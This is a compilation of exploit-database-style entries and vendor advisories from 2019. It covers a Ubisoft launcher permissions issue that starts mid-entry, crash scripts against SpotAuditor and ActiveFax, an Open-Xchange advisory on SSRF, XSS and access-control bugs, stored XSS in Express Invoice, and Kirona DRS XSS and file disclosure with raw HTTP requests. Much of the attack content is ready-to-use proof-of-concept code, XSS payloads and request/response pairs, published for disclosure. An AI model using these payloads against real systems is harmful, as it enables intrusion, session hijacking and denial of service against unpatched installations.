C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher"
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher BUILTIN\Users:(F)
                                                     BUILTIN\Users:(OI)(CI)(IO)(F)
                                                     NT SERVICE\TrustedInstaller:(I)(F)
                                                     NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                                     BUILTIN\Administrators:(I)(F)
                                                     BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                                     BUILTIN\Users:(I)(RX)
                                                     BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                                     CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)




Vulnerability Disclosure Timeline:
==================================
07 Aug, 19 : Found Vulnerability
07 Aug, 19 : Vendor Notification
14 Aug, 19 : Vendor Response
18 Sep, 19 : Vendor Fixed
18 Sep, 19  : Vendor released new patched

# Exploit Title: SpotAuditor 5.3.1.0 - Denial of Service
# Author: Sanjana Shetty
# Date: 2019-10-13
# Version: SpotAuditor 5.3.1.0
# Vendor Homepage: http://www.nsauditor.com
# Software link: http://spotauditor.nsauditor.com/


# <POC by Sanjana Shetty>
# Steps

[1] Install the SpotAuditor software

[2] Access the register functionality

[3] In the name field enter 5000 A's and press enter, this will crash the
application.

==== use below script to create 5000 A's to a text file and copy it to the name field============


print ("# POC by sanjana shetty")

try:
       f = open("file.txt","w")
       junk =  "\x41" * 5000
       f.write(junk)
       print ("done")

except (Exception, e):

      print ("#error - ") + str(e)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Dear subscribers,

we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities. Feel free to join our bug bounty programs (appsuite, dovecot, powerdns) at HackerOne.

Yours sincerely,
Martin Heiland, Open-Xchange GmbH



Product: OX App Suite
Vendor: OX Software GmbH

Internal reference: 66094 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.1 and 7.10.2
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.0-rev33, 7.10.1-rev17, 7.10.2-rev9
Vendor notification: 2019-07-08
Solution date: 2019-08-09
Public disclosure: 2019-10-09
Researcher Credits: mantis
CVE reference: CVE-2019-14225
CVSS: 6.4 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L)

Vulnerability Details:
The subscription mechanism for external iCal event sources follows HTTP redirection codes.

Risk:
Requests can be redirected to internal network targets if the attacker controls and injects redirect codes from the supposed iCal event source. Checking the content of the returned errors and their timing allows to gather information about internal network topology and services. This can be used as a reconnaissance pattern for further attacks.

Steps to reproduce:
1. Create a webservice that redirects HTTP requests to internal hosts
2. Configure that webservice as target of "external calendar" sources
3. Check response patterns when altering the redirection target

Solution:
We disabled HTTP redirection at the responsible HTTP client component.


---


Internal reference: 66081 (Bug ID)
Vulnerability type: Cross-site scripting (CWE-80)
Vulnerable version: 7.10.1 and 7.10.2
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.0-rev30, 7.10.1-rev16, 7.10.2-rev7
Vendor notification: 2019-07-08
Solution date: 2019-08-09
Public disclosure: 2019-10-09
Researcher Credits: Manas Gupta
CVE reference: CVE-2019-14227
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

Vulnerability Details:
Calendar print view (for week, months) executes script code that is part of an appointments title.

Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). For this to work an attacker needs to inject a malicious appointment to the victims calendar first, for example through a seemingly legitimate calendar invite or by being part of the same context.

Steps to reproduce:
1. Create a appointment with script code fragments as title
2. Open "View" -> "Print" at a calendar view and cancel the native print dialog

Proof of concept:
<iframe/onMouseOver="document.location.href='https://example.com/ox.png'">

Solution:
We fixed the template engines escaping routines.


---


Internal reference: 66025 (Bug ID)
Vulnerability type: Cross-site scripting (CWE-80)
Vulnerable version: 7.10.1 and 7.10.2
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.1-rev16, 7.10.2-rev7
Vendor notification: 2019-07-04
Solution date: 2019-07-30
Public disclosure: 2019-10-09
Researcher Credits: Michael Medvedev
CVE reference: CVE-2019-14227
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

Vulnerability Details:
Appointment dialogs contain a folder selector which is not properly escaping folder names.

Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). For this to work an attacker needs to modify a calendar folder within the same context or trick the user to do so.

Steps to reproduce:
1. Change a calendar folder to contain script code (or change the users name accordingly)
2. Edit or create a new appointment

Proof of concept:
ayb"><img src=x onerror=alert(document.domain)>

Solution:
We now escape folder names at this part of the dialog.


---


Internal reference: 65805 (Bug ID)
Vulnerability type: Information Exposure (CWE-200)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev60, 7.10.0-rev33, 7.10.1-rev17, 7.10.2-rev9
Vendor notification: 2019-06-24
Solution date: 2019-08-09
Public disclosure: 2019-10-09
Researcher Credits: hd7exploit
CVE reference: CVE-2019-14226
CVSS: 3.1 (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)

Vulnerability Details:
Information about external sharing URLs is provided to users that have non-administrative permissions to a folder.

Risk:
Other users could discover sharing links and use that to keep access to a folders content even though permissions has been revoked for them at a later point in time.

Steps to reproduce:
1. As User A, create a sharing link for a folder (e.g. Calendar) and invite internal User B with "Viewer" permissions
2. As User B, check the responses of "folder?action=get" for shared folders

Proof of concept:
The response contains a "share_url" parameter

Solution:
We removed the paramter from API responses for users that don't have access to modify it (administrative permissions).


---


Internal reference: 65799 (Bug ID)
Vulnerability type: Improper Access Control (CWE-284)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev60, 7.10.0-rev33, 7.10.1-rev17, 7.10.2-rev9
Vendor notification: 2019-06-24
Solution date: 2019-08-09
Public disclosure: 2019-10-09
Researcher Credits: hd7exploit
CVE reference: CVE-2019-14226
CVSS: 3.1 (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N)

Vulnerability Details:
The attachment API allows to add attachments to tasks which are marked as "private" by their owner, in case the other user has permission to the task folder.

Risk:
Other users could unexpectedly add (malicious) content to tasks. Creators of those "private" tasks would not expect other users to be able to do so as those users are unable to access the task.

Steps to reproduce:
1. As User A, create "private" task and share the containing folder to User B
2. As User B, iterate through task IDs and try to attach files

Proof of concept:
The "attachment?action=attach" call allows to add attachments for tasks that are marked as "private" and not available to the user.

Solution:
We improved permission handling for the attachment API when dealing with "private" tasks.


---


Internal reference: 65722 (Bug ID)
Vulnerability type: Improper Access Control (CWE-284)
Vulnerable version: 7.10.1 and 7.10.2
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.0-rev33, 7.10.1-rev17, 7.10.2-rev9
Vendor notification: 2019-06-18
Solution date: 2019-08-09
Public disclosure: 2019-10-09
Researcher Credits: hd7exploit
CVE reference: CVE-2019-14226
CVSS: 2.2 (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N)

Vulnerability Details:
The API allows to change the visibility of appointments within shared folders, even though the user interface does not provide that option.

Risk:
Other users than the creator might change appointment visibility, which is unexpected. This is more of a cosmetical issue as it requires elevated permissions.

Steps to reproduce:
1. As User A, create an appointment and share the containing folder to User B with "author" permissions
2. As User B, modify the appointments visibility through API calls

Proof of concept:
Call "chronos?action=update" for an appointment created by User A and set the "class" parameter to "PRIVATE".

Solution:
We did adjust API handling to avoid other users than the creator of an appointment to modify its visibility.

-----BEGIN PGP SIGNATURE-----
Version: BCPG v1.62

iQIcBAABCgAGBQJdncMRAAoJEAJhPBDDBiJjuRoP/A01J+aTl+r91xF+iAiZma5Q
8V9hN6IV7ycexUqCbQwQ5Nr+Bqu+hCuiXQUqtSUy+0D4QLvZu8psVTMb8JFjSHTn
UF5kv4ldkDPO174srPvL5xBMiY2F5H+kRBQjTitCHHhE7lPdGUcAL0JICaKg60NR
4G/UJF1XTlCJ8mU0SBJllsx8wFXq5WqrwZfQskRtiBgTetcYGIb/13dI9ekNu52O
OmKHRa8z+j68DGGKpw7hDx535WAOMy1ovdhV/HL4yeiDmYX41isYKtaGHfPsTUxa
lt7VdwAkOEWszb5AnKJJx0Gef7oxtLDafuMqQtIAVaxLTYmJGUpxz+fZPxXDMuR0
AYGeWGptDceZ8SMUO5n69ICT1+cwtqAnCce6aVFGuyl4vkbqMSbKoQ5SpbuY8pZ7
785Yv4DcoUJ3w9h2rOIiQ15A6MdCx5D0hRKfNiRV12uPEDQ4N7C4vcIhL2bBFVdO
dMltJtIz9Fk8pVAeUDriOH77/Cihx5VhTEf4LKtKQHB0ttbkNBqqI7sNYDy09T5F
VfLVPHwajPj+HJkKYtj8wq1kOpqWKXiAfG9DkECXIJzq+5E1NS2PlPPB5gTEyDUH
b+f+ucUDAhxjbqyhJde9ciI4+sWgX4GUOYMoQ9eCrEBpxuuVZseRn+QDrugxCPEQ
K50WE4Ml541v+yyYJ6UJ
=1dxs
-----END PGP SIGNATURE-----

# Exploit Title: ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service
# Date: 2019-10-12
# Vendor Homepage: https://www.actfax.com/
# Software Link :  https://www.actfax.com/download/actfax_setup_x64_ge.exe
# Exploit Author: Achilles
# Tested Version: 6.92
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow

# Steps to Produce the Crash: 
# 1.- Run python code : ActiveFax_Server.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open ActiveFaxServer.exe
# 4.- Open the Pop3 Server Config
# 5.- Press New
# 6.- Paste the content of EVIL.txt into the field: 'POP3 Server Address and Login and Password'
# 7.- Press ok Twice
# 8.- And you will see a crash.

#!/usr/bin/env python

buffer = "\x41" * 6000

try:
  f=open("Evil.txt","w")
  print "[+] Creating %s bytes evil payload.." %len(buffer)
  f.write(buffer)
  f.close()
  print "[+] File created!"
except:
  print "File cannot be created"

# Exploit Title: Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting
# Exploit Author: Debashis Pal
# Date: 2019-10-13
# Vendor Homepage: https://www.nchsoftware.com/
# Source: https://www.nchsoftware.com/invoice/index.html
# Version: Express Invoice v7.12
# CVE : N/A
# Tested on: Windows 7 SP1(32bit)

# About Express Invoice v7.12
==============================
Express Invoice lets you create invoices you can print, email or fax directly to clients for faster payment. 

# Vulnerability 
================
Persistent Cross site scripting (XSS).

# PoC 
======

1. Login as authenticated unprivileged user to Express Invoice version 7.12 web enable service i.e  http://A.B.C.D:96 [Default installation]. 

2. Under "Invoices" Invoices List -> View Invoices -> Add New Invoice -> Customer: Field put </script><script>alert('XSS');</script>

Save the change. 

or 

Under "Items"
Items -> Add new item-> Item field: put  </script><script>alert('XSS');</script>

Save the change. 

or 

Under "Customers"
Customers -> Add New Customer -> Customer Name:  put  </script><script>alert('XSS');</script>

Save the change. 

or 

Under "Quotes"
Quotes -> View Quotes -> Add New Quote -> Customer: put  </script><script>alert('XSS');</script>

Save the change. 

3. Login in authenticated privileged or unprivileged  user to Express Invoice v7.12 web enable service and visit any of Invoices/Items/Customers/Quotes section, Persistent XSS payload will execute.


# Disclosure Timeline
======================
Vulnerability Discover Date: 12-Sep-2019.
Vulnerability notification to vendor via vendor provided web form: 12-Sep-2019 ,13-Sep-2019, 19-Sep-2019, 26-Sep-2019, no responds. 
Submit exploit-db : 14-Oct-2019.


# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

# Exploit Title: Kirona-DRS 5.5.3.5 - Information Disclosure
# Discovered Date: 2019-10-03
# Shodan Search: /opt-portal/pages/login.xhtml
# Exploit Author: Ramikan
# Vendor Homepage: https://www.kirona.com/products/dynamic-resource-scheduler/
# Affected Version: DRS 5.5.3.5 may be other versions.
# Tested On Version: DRS 5.5.3.5 on PHP/5.6.14
# Vendor Fix: Unknown
# CVE: CVE-2019-17503,CVE-2019-17504
# Category: Web Apps
# Reference : https://github.com/Ramikan/Vulnerabilities/blob/master/Kirona-DRS 5.5.3.5 Multiple Vulnerabilities

# Description:
# The application is vulnerable to the HTML injection, reflected cross site scripting and sensitive data disclosure.

# Vulnerabiity 1:HTML injection and  (CVE-2019-17504)
# An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. A reflected Cross-site scripting (XSS) 
# vulnerability allows remote attackers to inject arbitrary web script via the /osm/report/ 'password' parameter.

Affected URL: /osm/report/ 

Affected Parameter: password


POST Request:

POST /osm/report/ HTTP/1.1
Host: 10.50.3.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
Connection: close
Referer: https://10.50.3.148/osm/report/
Upgrade-Insecure-Requests: 1

create=true&password=&login=admin&password='<"><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--


Response:

HTTP/1.1 200 OK
Date: Thu, 03 Oct 2019 14:56:05 GMT
Server: Apache
X-Powered-By: PHP/5.6.14
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-WithXDomainRequestAllowed: 1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Oct 2019 14:56:05 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 728
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head>  
<img src='logo.jpg'>      
<form method='POST'>
<input type='hidden' name='create' value='true'/>
<input type='hidden' name='password' value=''<"><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/>
<table>
<tr><td>Login:</td><td><input type='login' name='login'/></td></tr>
<tr><td>Password:</td><td><input type='password' name='password'/></td></tr>
<tr><td colspan='2'><input type='submit' value='Login'/> </td></tr>
</table>
</form>
</head>
</html>


GET Request:

GET https://10.0.1.110/osm/report/?password=%27%3C%22%20%3E%3C%3Ch1%3EHTML%20Injection-heading%20tag%20used%3C/h1%3E%3Cscript%3Ealert(%22This%20is%20Cross%20Site%20Scripting%22)%3C/script%3E%3C!-- HTTP/1.1
Host: vs-kdrs-l-01.selwoodhousing.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


Response:

HTTP/1.1 200 OK
Date: Thu, 03 Oct 2019 14:53:35 GMT
Server: Apache
X-Powered-By: PHP/5.6.14
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
XDomainRequestAllowed: 1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Oct 2019 14:53:35 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 728
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head>  
<img src='logo.jpg'>      
<form method='POST'>
<input type='hidden' name='create' value='true'/>
<input type='hidden' name='password' value=''<"><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/>
<table>
<tr><td>Login:</td><td><input type='login' name='login'/></td></tr>
<tr><td>Password:</td><td><input type='password' name='password'/></td></tr>
<tr><td colspan='2'><input type='submit' value='Login'/> </td></tr>
</table>
</form>
</head>
</html> 


***************************************************************************************************************************
Vulnerability 2: Source code and sensitive data disclosure. (CVE-2019-17503)
***************************************************************************************************************************

An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly: it contains sensitive information about the database through the SQL queries within this batch file. This file exposes SQL database information such as database version, table name, column name, etc.

Affected URL: /osm/REGISTER.cmd or /osm_tiles/REGISTER.cmd

# Request:

GET /osm/REGISTER.cmd HTTP/1.1
Host: 10.0.0.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


Response:

HTTP/1.1 200 OK
Date: Thu, 03 Oct 2019 09:23:54 GMT
Server: Apache
Last-Modified: Tue, 07 Nov 2017 09:27:52 GMT
ETag: "1fc4-55d612f6cae13"
Accept-Ranges: bytes
Content-Length: 8132
Connection: close

@echo off

set DEBUGMAPSCRIPT=TRUE

rem
rem Find root path and batch name
rem root path is found relative to the current batch name
rem 

rem turn to short filename (remove white spaces)
for %%i in (%0) do (
  set SHORT_MAPSCRIPTBATCH_FILE=%%~fsi
    set MAPSCRIPTBATCH_FILE=%%~i

)
for %%i in (%SHORT_MAPSCRIPTBATCH_FILE%) do (
set MAPSCRIPTROOTDIR=%%~di%%~pi..\..\..
)

if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTROOTDIR=%MAPSCRIPTROOTDIR%
if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTBATCH_FILE=%MAPSCRIPTBATCH_FILE%

rem
rem find if we are in INTERRACTIVE mode or not and check the parameters
rem 
if "%1"=="" goto INTERACTIVE
goto NONINTERRACTIVE


:NONINTERRACTIVE
rem non interractive call so catch the parameters from command line
rem this is supposed to be called from the root DRS directory

if "%2"=="" (
  echo Invalid parameter 2
  pause
  goto :EOF
)

set ACCOUNT=%2
set STATIC=NO
if "%1"=="STATIC" set STATIC=YES

if "%DEBUGMAPSCRIPT%"=="TRUE" echo Command line mode %STATIC% %ACCOUNT%

if "%1"=="STATIC" goto GLOBAL
if "%1"=="DYNAMIC" goto GLOBAL
echo Invalid parameter 1
pause
goto :EOF

:INTERACTIVE
rem Interractive mode : ask for account and static mode
if "%DEBUGMAPSCRIPT%"=="TRUE" echo Interractive mode
echo Open Street Map setup for Xmbrace DRS
set /P ACCOUNT=Account name:
set /P STATIC=Limited map feature (YES/NO):


rem back to the setup directory
cd %MAPSCRIPTROOTDIR%

rem # READ AND DEFINE SETTINGS
for /F "tokens=1,* delims==" %%k in (conf\default.txt) do (
  if not "%%k"=="#=" set %%k=%%l
)
if exist CUSTOM\CONF\custom.txt (
  for /F "tokens=1,* delims==" %%k in (CUSTOM\CONF\custom.txt) do (
    if not "%%k"=="#=" set %%k=%%l
  )
)
for /F "tokens=1,* delims==" %%k in (conf\settings.txt) do (
  if not "%%k"=="#=" set %%k=%%l
)

if "%APACHE_USE_SSL%"=="TRUE" (
  set DEFAULT_HTTP_PROTOCOL=https
  set APACHE_USE_SSL_VALUE=true
  set DEFAULT_HTTP_PORT=%APACHE_HTTPS_PORT%
) else (
  set DEFAULT_HTTP_PROTOCOL=http
  set APACHE_USE_SSL_VALUE=false
  set DEFAULT_HTTP_PORT=%APACHE_HTTP_PORT%
)

goto GLOBAL



rem
rem good to go in a non interractive mode
rem the following is the generic par of the install, whatever we are in static or dynamic mode
rem
:GLOBAL
if "%DEBUGMAPSCRIPT%"=="TRUE" echo Global section

set MYSQL="MYSQL\MySQL Server 5.6 MariaDB\bin\mysql.exe"

echo delete from %ACCOUNT%.asp_custom_action where CA_CAPTION in ('Show on map','Closest')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo delete from %ACCOUNT%.asp_custom_tab where NAME='Map'> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

set INSERTFIELDS=%ACCOUNT%.asp_custom_action (CA_CAPTION,CA_VIEW,CA_MODE,CA_LIST_MODE,CA_HEIGHT,CA_WIDTH,CA_RESIZABLE,CA_NEED_REFRESH,CA_PROFILES,CA_URL,CA_CUSTOM_TAB,CA_TRIGGER_MODE)

if "%STATIC%"=="YES" goto :STATIC
goto :DYNAMIC



:STATIC

if "%DEBUGMAPSCRIPT%"=="TRUE" echo Static section

echo map=static > ACCOUNTS\%ACCOUNT%\config.txt

echo ^<?php $staticMap=true; ?^>>APACHE\htdocs\osm\mode.php

echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Journey on map','workerView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
if exist req.sql del req.sql
goto FINAL


:DYNAMIC

if "%DEBUGMAPSCRIPT%"=="TRUE" echo Dynamic section

echo map=dynamic > ACCOUNTS\%ACCOUNT%\config.txt

echo ^<?php $staticMap=false; ?^>>APACHE\htdocs\osm\mode.php

echo insert into %INSERTFIELDS% values ('Show on map','jobList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','jobView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Closest','jobList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Closest','jobView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Show on map','workerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','workerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','mandatory',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
rem %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Show on map','customerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','customerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Show on map','planning','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql


set INSERTFIELDS=%ACCOUNT%.asp_custom_tab (NAME,POSITION,ADMIN,URL,WIDTH,HEIGHT)

echo insert into %INSERTFIELDS% values ('Map',0,'false','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%','100%%','100%%')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

if exist req.sql del req.sql
goto FINAL


:FINAL
echo Map registred for %ACCOUNT%
if "%1"=="" pause
goto :EOF